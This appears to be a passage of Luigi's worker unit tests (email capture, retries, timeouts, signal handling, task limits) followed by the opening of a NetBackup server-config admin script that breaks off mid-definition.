timeout = 3.0 # We run 7 tasks that take 0.5s each so it should take less than 3.5s
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = Scheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
with Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
):
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
with Worker(ping_interval=0.01) as w:
self.assertTrue(w._keep_alive_thread.is_alive())
self.assertFalse(w._keep_alive_thread.is_alive())
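# email_patch wraps a test method so that error emails are captured instead of sent:
# it forces the error-email configuration on, patches smtplib.SMTP so that sendmail
# stores each message, and passes the captured messages to the test as the `emails` argument.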
def email_patch(test_func, email_config=None):
EMAIL_CONFIG = {"core": {"error-email": "not-a-real-email-address-for-test-only"}, "email": {"force-send": "true"}}
if email_config is not None:
EMAIL_CONFIG.update(email_config)
emails = []
def mock_send_email(sender, recipients, msg):
emails.append(msg)
@with_config(EMAIL_CONFIG)
@functools.wraps(test_func)
@mock.patch('smtplib.SMTP')
def run_test(self, smtp):
smtp().sendmail.side_effect = mock_send_email
test_func(self, emails)
return run_test
def custom_email_patch(config):
return functools.partial(email_patch, email_config=config)
class WorkerEmailTest(LuigiTestCase):
def run(self, result=None):
super(WorkerEmailTest, self).setUp()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as self.worker:
super(WorkerEmailTest, self).run(result)
@email_patch
def test_connection_error(self, emails):
sch = RemoteScheduler('http://tld.invalid:1337', connect_timeout=1)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
with Worker(scheduler=sch) as worker:
try:
worker.add(a)
except RPCError:
self.assertEqual(self.waits, 2) # should attempt to add it 3 times
self.assertNotEqual(emails, [])
self.assertTrue(emails[0].find("Luigi: Framework error while scheduling %s" % (a,)) != -1)
else:
self.fail()
@email_patch
def test_complete_error(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_error_email_batch(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_error_email_batch_to_owner(self, emails):
class A(DummyTask):
owner_email = 'a_owner@test.com'
def complete(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue(any(
"1 scheduling failure" in email and 'a_owner@test.com' in email
for email in emails))
@email_patch
def test_requires_error(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_requires_error_email_batch(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@email_patch
def test_complete_return_value(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_return_value_email_batch(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@email_patch
def test_run_error(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
a = A()
luigi.build([a], workers=1, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_email_batch(self, emails):
class A(luigi.Task):
owner_email = ['a@test.com', 'b@test.com']
def run(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
worker.add(A())
worker.run()
scheduler.prune()
self.assertEqual(3, len(emails))
self.assertTrue(any('a@test.com' in email for email in emails))
self.assertTrue(any('b@test.com' in email for email in emails))
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_batch_email_string(self, emails):
class A(luigi.Task):
owner_email = 'a@test.com'
def run(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
worker.add(A())
worker.run()
scheduler.prune()
self.assertEqual(2, len(emails))
self.assertTrue(any('a@test.com' in email for email in emails))
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_no_email(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
luigi.build([A()], workers=1, local_scheduler=True)
self.assertFalse(emails)
@email_patch
def test_task_process_dies_with_email(self, emails):
a = SendSignalTask(signal.SIGKILL)
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("died unexpectedly with exit code -9") != -1)
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_task_process_dies_no_email(self, emails):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
self.assertEqual([], emails)
@email_patch
def test_task_times_out(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("timed out after 0.0001 seconds and was terminated.") != -1)
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_task_times_out_no_email(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
luigi.build([A()], workers=2, local_scheduler=True)
self.assertEqual([], emails)
@with_config(dict(worker=dict(retry_external_tasks='true')))
@email_patch
def test_external_task_retries(self, emails):
"""
Test that we do not send error emails on the failures of external tasks
"""
class A(luigi.ExternalTask):
pass
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(emails, [])
@email_patch
def test_no_error(self, emails):
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertTrue(a.complete())
@custom_email_patch({"core": {"error-email": "not-a-real-email-address-for-test-only", 'email-type': 'none'}})
def test_disable_emails(self, emails):
class A(luigi.Task):
def complete(self):
raise Exception("b0rk")
self.worker.add(A())
self.assertEqual(emails, [])
class RaiseSystemExit(luigi.Task):
def run(self):
raise SystemExit("System exit!!")
class SendSignalTask(luigi.Task):
signal = luigi.IntParameter()
def run(self):
os.kill(os.getpid(), self.signal)
class HangTheWorkerTask(luigi.Task):
worker_timeout = luigi.IntParameter(default=None)
def run(self):
while True:
pass
def complete(self):
return False
class MultipleWorkersTest(unittest.TestCase):
@unittest.skip('Always skip. There are many intermittent failures')
    # This passes under python3 when run as `nosetests test/worker_test.py`
    # but not as `nosetests test`. Probably some side effect from previous tests
@unittest.skipIf(six.PY3, 'This test fail on python3 when run with tox.')
def test_multiple_workers(self):
# Test using multiple workers
# Also test generating classes dynamically since this may reflect issues with
# various platform and how multiprocessing is implemented. If it's using os.fork
        # under the hood it should be fine, but dynamic classes can't be pickled, so
# other implementations of multiprocessing (using spawn etc) may fail
class MyDynamicTask(luigi.Task):
x = luigi.Parameter()
def run(self):
time.sleep(0.1)
t0 = time.time()
luigi.build([MyDynamicTask(i) for i in range(100)], workers=100, local_scheduler=True)
self.assertTrue(time.time() < t0 + 5.0) # should ideally take exactly 0.1s, but definitely less than 10.0
def test_zero_workers(self):
d = DummyTask()
luigi.build([d], workers=0, local_scheduler=True)
self.assertFalse(d.complete())
def test_system_exit(self):
# This would hang indefinitely before this fix:
# https://github.com/spotify/luigi/pull/439
luigi.build([RaiseSystemExit()], workers=2, local_scheduler=True)
def test_term_worker(self):
luigi.build([SendSignalTask(signal.SIGTERM)], workers=2, local_scheduler=True)
def test_kill_worker(self):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
def test_purge_multiple_workers(self):
w = Worker(worker_processes=2, wait_interval=0.01)
t1 = SendSignalTask(signal.SIGTERM)
t2 = SendSignalTask(signal.SIGKILL)
w.add(t1)
w.add(t2)
w._run_task(t1.task_id)
w._run_task(t2.task_id)
time.sleep(1.0)
w._handle_next_task()
w._handle_next_task()
w._handle_next_task()
def test_stop_worker_kills_subprocesses(self):
with Worker(worker_processes=2) as w:
hung_task = HangTheWorkerTask()
w.add(hung_task)
w._run_task(hung_task.task_id)
pids = [p.pid for p in w._running_tasks.values()]
self.assertEqual(1, len(pids))
pid = pids[0]
def is_running():
return pid in {p.pid for p in psutil.Process().children()}
self.assertTrue(is_running())
self.assertFalse(is_running())
def test_time_out_hung_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=2, local_scheduler=True)
def test_time_out_hung_single_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=1, local_scheduler=True)
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/72953986')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_default_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask()
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 5
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 6
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/76645264')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_override_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=10)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 10
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 11
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
class Dummy2Task(Task):
p = luigi.Parameter()
def output(self):
return MockTarget(self.p)
def run(self):
f = self.output().open('w')
f.write('test')
f.close()
class AssistantTest(unittest.TestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.assistant = Worker(scheduler=self.sch, worker_id='Y', assistant=True)
with Worker(scheduler=self.sch, worker_id='X') as w:
self.w = w
super(AssistantTest, self).run(result)
def test_get_work(self):
d = Dummy2Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assistant.run()
self.assertTrue(d.complete())
def test_bad_job_type(self):
class Dummy3Task(Dummy2Task):
task_family = 'UnknownTaskFamily'
d = Dummy3Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assertFalse(self.assistant.run())
self.assertFalse(d.complete())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [d.task_id])
def test_unimported_job_type(self):
MODULE_CONTENTS = b'''
import luigi
class UnimportedTask(luigi.Task):
def complete(self):
return False
'''
reg = luigi.task_register.Register._get_reg()
class UnimportedTask(luigi.Task):
task_module = None # Set it here, so it's generally settable
luigi.task_register.Register._set_reg(reg)
task = UnimportedTask()
# verify that it can't run the task without the module info necessary to import it
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
# check that it can import with the right module
with temporary_unloaded_module(MODULE_CONTENTS) as task.task_module:
self.w.add(task)
self.assertTrue(self.assistant.run())
self.assertEqual(list(self.sch.task_list('DONE', '').keys()), [task.task_id])
def test_unimported_job_sends_failure_message(self):
class NotInAssistantTask(luigi.Task):
task_family = 'Unknown'
task_module = None
task = NotInAssistantTask()
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
self.assertTrue(self.sch.fetch_error(task.task_id)['error'])
class ForkBombTask(luigi.Task):
depth = luigi.IntParameter()
breadth = luigi.IntParameter()
p = luigi.Parameter(default=(0, )) # ehm for some weird reason [0] becomes a tuple...?
def output(self):
return MockTarget('.'.join(map(str, self.p)))
def run(self):
with self.output().open('w') as f:
f.write('Done!')
def requires(self):
if len(self.p) < self.depth:
for i in range(self.breadth):
yield ForkBombTask(self.depth, self.breadth, self.p + (i, ))
class TaskLimitTest(unittest.TestCase):
def tearDown(self):
MockFileSystem().remove('')
@with_config({'core': {'worker-task-limit': '6'}})
def test_task_limit_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertFalse(t.complete())
leaf_tasks = [ForkBombTask(3, 2, branch) for branch in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1)]]
self.assertEqual(3, sum(t.complete() for t in leaf_tasks),
"should have gracefully completed as much as possible even though the single last leaf didn't get scheduled")
@with_config({'core': {'worker-task-limit': '7'}})
def test_task_limit_not_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
def test_no_task_limit(self):
w = Worker()
t = ForkBombTask(4, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
class WorkerConfigurationTest(unittest.TestCase):
def test_asserts_for_worker(self):
"""
Test that Worker() asserts that it's sanely configured
"""
Worker(wait_interval=1) # This shouldn't raise
self.assertRaises(AssertionError, Worker, wait_interval=0)
class WorkerWaitJitterTest(unittest.TestCase):
@with_config({'worker': {'wait_jitter': '10.0'}})
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter(self, mock_sleep, mock_random):
""" verify configured jitter amount """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 2.0
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(3.0)
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter_default(self, mock_sleep, mock_random):
""" verify default jitter is as expected """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 3.3
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(4.3)
class KeyboardInterruptBehaviorTest(LuigiTestCase):
def test_propagation_when_executing(self):
"""
Ensure that keyboard interrupts causes luigi to quit when you are
executing tasks.
TODO: Add a test that tests the multiprocessing (--worker >1) case
"""
class KeyboardInterruptTask(luigi.Task):
def run(self):
raise KeyboardInterrupt()
cmd = 'KeyboardInterruptTask --local-scheduler --no-lock'.split(' ')
self.assertRaises(KeyboardInterrupt, luigi_run, cmd)
def test_propagation_when_scheduling(self):
"""
Test that KeyboardInterrupt causes luigi to quit while scheduling.
"""
class KeyboardInterruptTask(luigi.Task):
def complete(self):
raise KeyboardInterrupt()
class ExternalKeyboardInterruptTask(luigi.ExternalTask):
def complete(self):
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, luigi_run,
['KeyboardInterruptTask', '--local-scheduler', '--no-lock'])
self.assertRaises(KeyboardInterrupt, luigi_run,
['ExternalKeyboardInterruptTask', '--local-scheduler', '--no-lock'])
class WorkerPurgeEventHandlerTest(unittest.TestCase):
@mock.patch('luigi.worker.TaskProcess')
def test_process_killed_handler(self, task_proc):
result = []
@HangTheWorkerTask.event_handler(Event.PROCESS_FAILURE)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker()
task = HangTheWorkerTask()
task_process = mock.MagicMock(is_alive=lambda: False, exitcode=-14, task=task)
task_proc.return_value = task_process
w.add(task)
w._run_task(task.task_id)
w._handle_next_task()
self.assertEqual(result, [task])
@mock.patch('luigi.worker.time')
def test_timeout_handler(self, mock_time):
result = []
@HangTheWorkerTask.event_handler(Event.TIMEOUT)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=1)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 3
w._handle_next_task()
self.assertEqual(result, [task])
class PerTaskRetryPolicyBehaviorTest(LuigiTestCase):
def setUp(self):
super(PerTaskRetryPolicyBehaviorTest, self).setUp()
self.per_task_retry_count = 2
self.default_retry_count = 1
self.sch = Scheduler(retry_delay=0.1, retry_count=self.default_retry_count, prune_on_get_work=True)
def test_with_all_disabled_with_single_worker(self):
"""
        With this test, a case is tested in which a task (TestWrapperTask) requires two other tasks (TestErrorTask1, TestErrorTask2) that both fail.
        Task TestErrorTask1 has the default retry_count of 1, while Task TestErrorTask2 sets retry_count to 2 at the task level.
        This test runs on a single worker.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_all_disabled_with_multiple_worker(self):
"""
        With this test, a case is tested in which a task (TestWrapperTask) requires two other tasks (TestErrorTask1, TestErrorTask2) that both fail.
        Task TestErrorTask1 has the default retry_count of 1, while Task TestErrorTask2 sets retry_count to 2 at the task level.
        This test runs on multiple workers.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e2))
self.assertTrue(w3.add(e1))
self.assertFalse(w3.run())
self.assertFalse(w2.run())
self.assertTrue(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_includes_success_with_single_worker(self):
"""
        With this test, a case is tested in which a task (TestWrapperTask) requires one task (TestErrorTask1) that FAILS and one (TestSuccessTask1) that SUCCEEDS.
        Task TestSuccessTask1 will be DONE successfully, while Task TestErrorTask1 will fail; it sets retry_count to 2 at the task level.
        This test runs on a single worker.
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_includes_success_with_multiple_worker(self):
"""
        With this test, a case is tested in which a task (TestWrapperTask) requires one task (TestErrorTask1) that FAILS and one (TestSuccessTask1) that SUCCEEDS.
        Task TestSuccessTask1 will be DONE successfully, while Task TestErrorTask1 will fail; it sets retry_count to 2 at the task level.
        This test runs on multiple workers.
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e1))
self.assertTrue(w3.add(s1))
self.assertTrue(w3.run())
self.assertFalse(w2.run())
self.assertTrue(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_single_worker(self):
"""
        This test covers a case with dynamic dependency tasks (TestErrorTask1, TestErrorTask2) that both fail.
        Task TestErrorTask1 has the default retry_count of 1, while Task TestErrorTask2 sets retry_count to 2 at the task level.
        This test runs on a single worker.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_multiple_workers(self):
"""
        This test covers a case with dynamic dependency tasks (TestErrorTask1, TestErrorTask2) that both fail.
        Task TestErrorTask1 has the default retry_count of 1, while Task TestErrorTask2 sets retry_count to 2 at the task level.
        This test runs on multiple workers.
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(s1))
self.assertTrue(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
|
del_server_nbu.py
|
import logging
import os
import os.path
import platform
import subprocess
import threading
from math import ceil
from optparse import OptionParser
from sys import exit, stdout
is_win = platform.system() == 'Windows'
bin_admin_path = r'C:\Program Files\Veritas\NetBackup\bin\admincmd' if is_win else r'/usr/openv/netbackup/bin/admincmd'
BPGETCONFIG = r'bpgetconfig.exe' if is_win else r'bpgetconfig'
BPSETCONFIG = r'bpsetconfig.exe' if is_win else r'bpsetconfig'
FORMAT = 'thread %(thread)d: %(message)s '
usage = "usage: %prog [options] host1 host2 host3 ..."
parser = OptionParser(usage)
parser.add_option("-f", "--file", dest="host_list_file",
help="read hosts from file, one per line;")
parser.add_option("-s", "--server", dest="server_file", default=None,
help="read new server entries from file, bp.conf syntax SERVER = HOSTNAME")
parser.add_option("-b", "--bin_admin",
dest="bin_admin", default=bin_admin_path,
help="path to .../netbackup/bin/admincmd")
parser.add_option("-n", "--num_threads",
dest="num_threads", default=100,
help="number of threads to run simultaneously")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="print status messages to stdout")
parser.add_option("-d", "--debug",
action="store_true", dest="debug", default=False,
help="print debug messages to stdout")
(options, args) = parser.parse_args()
hosts = args
servers = []
bpgetconfig_path = os.path.join(options.bin_admin, BPGETCONFIG)
bpsetconfig_path = os.path.join(options.bin_admin, BPSETCONFIG)
if options.debug:
logging.basicConfig(stream=stdout, format=FORMAT, level=logging.DEBUG)
else:
if options.verbose:
logging.basicConfig(stream=stdout, format=FORMAT, level=logging.INFO)
else:
logging.basicConfig(stream=stdout, format=FORMAT, level=logging.WARN)
if options.host_list_file:
if os.path.isfile(options.host_list_file):
with open(options.host_list_file) as f:
hosts = hosts + f.read().splitlines()
if os.path.isfile(options.server_file):
with open(options.server_file) as f:
servers = f.read().splitlines()
servers = filter(None, servers)
for entry in servers:
if entry[:9] != 'SERVER = ':
logging.critical("Entry >>{0}<< doesn't have >>SERVER = << in it".format(entry))
exit(1)
else:
logging.critical("Can't find server file {0}".format(options.server_file))
exit(1)
if len(hosts) == 0:
logging.critical('No hosts were provided for a check')
exit(1)
if not os.path.isfile(bpgetconfig_path):
logging.critical("Can't find bpgetconfig in {0}".format(options.bin_admin))
exit(1)
if not os.path.isfile(bpsetconfig_path):
logging.critical("Can't find bpsetconfig in {0}".format(options.bin_admin))
exit(1)
def split(arr, size):
arrs = []
while len(arr) > size:
        piece = arr[:size]
        arrs.append(piece)
arr = arr[size:]
arrs.append(arr)
return arrs
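# Illustrative check of the chunking helper above (assumption: a plain list of
# values standing in for host names); split() returns fixed-size slices with a
# shorter final chunk.
def _split_example():
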